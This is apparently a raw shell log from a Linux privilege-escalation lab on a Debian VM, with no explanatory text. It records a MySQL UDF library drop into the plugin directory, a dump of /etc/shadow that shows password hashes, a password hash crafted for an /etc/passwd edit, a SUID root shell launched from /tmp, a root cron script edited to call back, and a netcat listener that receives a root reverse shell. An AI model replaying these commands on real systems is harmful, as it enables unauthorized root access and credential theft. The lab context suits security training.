855Welcome to the MySQL monitor. Commands end with ; or \g.
856Your MySQL connection id is 37
857Server version: 5.1.73-1+deb6u1 (Debian)
858
859Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
860
861Oracle is a registered trademark of Oracle Corporation and/or its
862affiliates. Other names may be trademarks of their respective
863owners.
864
865Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
866
867mysql> use mysql;
868Reading table information for completion of table and column names
869You can turn off this feature to get a quicker startup with -A
870
871Database changed
872mysql> create table bmillakid(line blob);
873Query OK, 0 rows affected (0.00 sec)
874
875mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
876Query OK, 1 row affected (0.00 sec)
877
878mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
879ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
880mysql> exit
881Bye
882user@debian:~/tools/mysql-udf$ who am i
883user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
884user@debian:~/tools/mysql-udf$ links
885-bash: links: command not found
886user@debian:~/tools/mysql-udf$ lynx
887-bash: lynx: command not found
888user@debian:~/tools/mysql-udf$ wget
889wget: missing URL
890Usage: wget [OPTION]... [URL]...
891
892Try ‘wget --help’ for more options.
893user@debian:~/tools/mysql-udf$ cat /etc/shadow
894root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
895daemon:*:17298:0:99999:7:::
896bin:*:17298:0:99999:7:::
897sys:*:17298:0:99999:7:::
898sync:*:17298:0:99999:7:::
899games:*:17298:0:99999:7:::
900man:*:17298:0:99999:7:::
901lp:*:17298:0:99999:7:::
902mail:*:17298:0:99999:7:::
903news:*:17298:0:99999:7:::
904uucp:*:17298:0:99999:7:::
905proxy:*:17298:0:99999:7:::
906www-data:*:17298:0:99999:7:::
907backup:*:17298:0:99999:7:::
908list:*:17298:0:99999:7:::
909irc:*:17298:0:99999:7:::
910gnats:*:17298:0:99999:7:::
911nobody:*:17298:0:99999:7:::
912libuuid:!:17298:0:99999:7:::
913Debian-exim:!:17298:0:99999:7:::
914sshd:*:17298:0:99999:7:::
915user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
916statd:*:17299:0:99999:7:::
917mysql:!:18133:0:99999:7:::
918bmillakid:!:18645:0:99999:7:::
919user@debian:~/tools/mysql-udf$ cat /etc/passwd
920root:x:0:0:root:/root:/bin/bash
921daemon:x:1:1:daemon:/usr/sbin:/bin/sh
922bin:x:2:2:bin:/bin:/bin/sh
923sys:x:3:3:sys:/dev:/bin/sh
924sync:x:4:65534:sync:/bin:/bin/sync
925games:x:5:60:games:/usr/games:/bin/sh
926man:x:6:12:man:/var/cache/man:/bin/sh
927lp:x:7:7:lp:/var/spool/lpd:/bin/sh
928mail:x:8:8:mail:/var/mail:/bin/sh
929news:x:9:9:news:/var/spool/news:/bin/sh
930uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
931proxy:x:13:13:proxy:/bin:/bin/sh
932www-data:x:33:33:www-data:/var/www:/bin/sh
933backup:x:34:34:backup:/var/backups:/bin/sh
934list:x:38:38:Mailing List Manager:/var/list:/bin/sh
935irc:x:39:39:ircd:/var/run/ircd:/bin/sh
936gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
937nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
938libuuid:x:100:101::/var/lib/libuuid:/bin/sh
939Debian-exim:x:101:103::/var/spool/exim4:/bin/false
940sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
941user:x:1000:1000:user,,,:/home/user:/bin/bash
942statd:x:103:65534::/var/lib/nfs:/bin/false
943mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
944bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
945user@debian:~/tools/mysql-udf$ ls -la user
946ls: cannot access user: No such file or directory
947user@debian:~/tools/mysql-udf$ pwd
948/home/user/tools/mysql-udf
949user@debian:~/tools/mysql-udf$ who am i
950user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
951user@debian:~/tools/mysql-udf$ whoami
952user
953user@debian:~/tools/mysql-udf$ ls -la /
954total 96
955drwxr-xr-x 22 root root 4096 Aug 25 2019 .
956drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
957drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
958drwxr-xr-x 3 root root 4096 May 12 2017 boot
959drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
960drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
961drwxr-xr-x 3 root root 4096 May 15 2017 home
962lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32- 5-amd64
963drwxr-xr-x 12 root root 12288 May 14 2017 lib
964lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
965drwx------ 2 root root 16384 May 12 2017 lost+found
966drwxr-xr-x 3 root root 4096 May 12 2017 media
967drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
968drwxr-xr-x 2 root root 4096 May 12 2017 opt
969dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
970drwx------ 5 root root 4096 May 15 2020 root
971drwxr-xr-x 2 root root 4096 May 13 2017 sbin
972drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
973drwxr-xr-x 2 root root 4096 May 12 2017 srv
974drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
975drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
976drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
977drwxr-xr-x 11 root root 4096 May 13 2017 usr
978drwxr-xr-x 14 root root 4096 May 13 2017 var
979lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd6 4
980user@debian:~/tools/mysql-udf$ whoami
981user
982user@debian:~/tools/mysql-udf$ sudo -l
983Matching Defaults entries for user on this host:
984 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
985
986User user may run the following commands on this host:
987 (root) NOPASSWD: /usr/sbin/iftop
988 (root) NOPASSWD: /usr/bin/find
989 (root) NOPASSWD: /usr/bin/nano
990 (root) NOPASSWD: /usr/bin/vim
991 (root) NOPASSWD: /usr/bin/man
992 (root) NOPASSWD: /usr/bin/awk
993 (root) NOPASSWD: /usr/bin/less
994 (root) NOPASSWD: /usr/bin/ftp
995 (root) NOPASSWD: /usr/bin/nmap
996 (root) NOPASSWD: /usr/sbin/apache2
997 (root) NOPASSWD: /bin/more
998user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
999root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
1000user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
1001-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
1002user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
1003Warning: truncating password to 8 characters
10045v3Bvw7Nf6Zbs
1005user@debian:~/tools/mysql-udf$
1006user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
1007-bash: 5v3Bvw7Nf6Zbs: command not found
1008user@debian:~/tools/mysql-udf$ nano /etc/passwd
1009user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
1010rootbash-4.1# su newroot
1011Unknown id: newroot
1012rootbash-4.1# whoami
1013root
1014rootbash-4.1# cat /etc/passwd
1015root:x:0:0:root:/root:/bin/bash
1016daemon:x:1:1:daemon:/usr/sbin:/bin/sh
1017bin:x:2:2:bin:/bin:/bin/sh
1018sys:x:3:3:sys:/dev:/bin/sh
1019sync:x:4:65534:sync:/bin:/bin/sync
1020games:x:5:60:games:/usr/games:/bin/sh
1021man:x:6:12:man:/var/cache/man:/bin/sh
1022lp:x:7:7:lp:/var/spool/lpd:/bin/sh
1023mail:x:8:8:mail:/var/mail:/bin/sh
1024news:x:9:9:news:/var/spool/news:/bin/sh
1025uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
1026proxy:x:13:13:proxy:/bin:/bin/sh
1027www-data:x:33:33:www-data:/var/www:/bin/sh
1028backup:x:34:34:backup:/var/backups:/bin/sh
1029list:x:38:38:Mailing List Manager:/var/list:/bin/sh
1030irc:x:39:39:ircd:/var/run/ircd:/bin/sh
1031gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
1032nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
1033libuuid:x:100:101::/var/lib/libuuid:/bin/sh
1034Debian-exim:x:101:103::/var/spool/exim4:/bin/false
1035sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
1036user:x:1000:1000:user,,,:/home/user:/bin/bash
1037statd:x:103:65534::/var/lib/nfs:/bin/false
1038mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
1039bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
1040rootbash-4.1# su root
1041Password:
1042su: Authentication failure
1043rootbash-4.1# exit
1044exit
1045user@debian:~/tools/mysql-udf$ sudo -l
1046Matching Defaults entries for user on this host:
1047 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
1048
1049User user may run the following commands on this host:
1050 (root) NOPASSWD: /usr/sbin/iftop
1051 (root) NOPASSWD: /usr/bin/find
1052 (root) NOPASSWD: /usr/bin/nano
1053 (root) NOPASSWD: /usr/bin/vim
1054 (root) NOPASSWD: /usr/bin/man
1055 (root) NOPASSWD: /usr/bin/awk
1056 (root) NOPASSWD: /usr/bin/less
1057 (root) NOPASSWD: /usr/bin/ftp
1058 (root) NOPASSWD: /usr/bin/nmap
1059 (root) NOPASSWD: /usr/sbin/apache2
1060 (root) NOPASSWD: /bin/more
1061user@debian:~/tools/mysql-udf$ cat /etc/crontab
1062# /etc/crontab: system-wide crontab
1063# Unlike any other crontab you don't have to run the `crontab'
1064# command to install the new version when you edit this file
1065# and files in /etc/cron.d. These files also have username fields,
1066# that none of the other crontabs do.
1067
1068SHELL=/bin/sh
1069PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
1070
1071# m h dom mon dow user command
107217 * * * * root cd / && run-parts --report /etc/cron.hourly
107325 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
107447 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
107552 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
1076#
1077* * * * * root overwrite.sh
1078* * * * * root /usr/local/bin/compress.sh
1079
1080user@debian:~/tools/mysql-udf$ locate overwrite.sh
1081locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
1082/usr/local/bin/overwrite.sh
1083user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
1084-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
1085user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
1086user@debian:/usr/local/bin$ ls
1087compress.sh overwrite.sh suid-env suid-env2 suid-so
1088user@debian:/usr/local/bin$ cat overwrite.sh
1089#!/bin/bash
1090
1091echo `date` > /tmp/useless
1092user@debian:/usr/local/bin$ nano overwrite.sh
1093user@debian:/usr/local/bin$ nc -nvlp 4444
1094listening on [any] 4444 ...
1095connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
1096allexport off
1097braceexpand on
1098emacs on
1099errexit off
1100errtrace off
1101functrace off
1102hashall on
1103histexpand on
1104history on
1105ignoreeof off
1106interactive-comments on
1107keyword off
1108monitor off
1109noclobber off
1110noexec off
1111noglob off
1112nolog off
1113notify off
1114nounset off
1115onecmd off
1116physical off
1117pipefail off
1118posix off
1119privileged off
1120verbose off
1121vi off
1122xtrace off
1123id
1124uid=0(root) gid=0(root) groups=0(root)
1125ls
1126cat /etc/passwd
1127root:x:0:0:root:/root:/bin/bash
1128daemon:x:1:1:daemon:/usr/sbin:/bin/sh
1129bin:x:2:2:bin:/bin:/bin/sh
1130sys:x:3:3:sys:/dev:/bin/sh
1131sync:x:4:65534:sync:/bin:/bin/sync
1132games:x:5:60:games:/usr/games:/bin/sh
1133man:x:6:12:man:/var/cache/man:/bin/sh
1134lp:x:7:7:lp:/var/spool/lpd:/bin/sh
1135mail:x:8:8:mail:/var/mail:/bin/sh
1136news:x:9:9:news:/var/spool/news:/bin/sh
1137uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
1138proxy:x:13:13:proxy:/bin:/bin/sh
1139www-data:x:33:33:www-data:/var/www:/bin/sh
1140backup:x:34:34:backup:/var/backups:/bin/sh
1141list:x:38:38:Mailing List Manager:/var/list:/bin/sh
1142irc:x:39:39:ircd:/var/run/ircd:/bin/sh
1143gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
1144nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
1145libuuid:x:100:101::/var/lib/libuuid:/bin/sh
1146Debian-exim:x:101:103::/var/spool/exim4:/bin/false
1147sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
1148user:x:1000:1000:user,,,:/home/user:/bin/bash
1149statd:x:103:65534::/var/lib/nfs:/bin/false
1150mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
1151bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
1152user@debian:/usr/local/bin$
1153
1154login as: user
1155user@10.10.170.166's password:
1156Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
1157
1158The programs included with the Debian GNU/Linux system are free software;
1159the exact distribution terms for each program are described in the
1160individual files in /usr/share/doc/*/copyright.
1161
1162Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
1163permitted by applicable law.
1164Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
1165user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
1166user@debian:~$ cat l33t.txt
1167user@debian:~$ ls
1168l33t.txt myvpn.ovpn tools
1169user@debian:~$ cat l33t.txt
1170user@debian:~$ ls
1171l33t.txt myvpn.ovpn tools
1172user@debian:~$ dmesg | grep /var/log/messages
1173user@debian:~$ tail -f /var/log/messages
1174tail: cannot open `/var/log/messages' for reading: Permission denied
1175user@debian:~$ tail -f /var/log/messages | less
1176user@debian:~$ tail -f /var/log/auth.log
1177tail: cannot open `/var/log/auth.log' for reading: Permission denied
1178user@debian:~$ /tmp/rootbash -p
1179rootbash-4.1# tail -f /var/log/messages
1180Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1181Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1182Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1183Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1184Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1185Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1186Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1187Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1188Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1189Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1190
1191
1192
1193
1194
1195ls
1196^C
1197rootbash-4.1# cat /var/log/messages
1198May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
1199May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
1200May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
1201May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
1202May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
1203May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
1204May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1205May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
1206May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
1207May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
1208May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
1209May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
1210May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
1211May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
1212May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
1213May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
1214May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
1215May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
1216May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
1217May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
1218May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
1219May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
1220May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
1221May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
1222May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
1223May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
1224May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
1225May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
1226May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
1227May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
1228May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
1229May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
1230May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
1231May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
1232May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
1233May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
1234May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
1235May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
1236May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
1237May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
1238May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
1239May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
1240May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
1241May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
1242May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
1243May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
1244May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
1245May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
1246May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
1247May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
1248May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
1249May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
1250May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
1251May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
1252May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
1253May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
1254May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
1255May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
1256May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
1257May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
1258May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
1259May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
1260May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
1261May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
1262May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
1263May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
1264May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
1265May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
1266May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
1267May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
1268May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
1269May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
1270May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
1271May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
1272May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
1273May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
1274May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
1275May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
1276May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
1277May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
1278May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
1279May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
1280May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
1281May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
1282May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
1283May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
1284May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
1285May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
1286May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
1287May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
1288May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
1289May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
1290May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
1291May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
1292May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
1293May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
1294May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
1295May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
1296May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
1297May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
1298May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
1299May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
1300May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
1301May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1302May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
1303May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
1304May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
1305May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
1306May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
1307May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
1308May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
1309May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
1310May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
1311May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
1312May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
1313May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
1314May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
1315May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
1316May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
1317May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
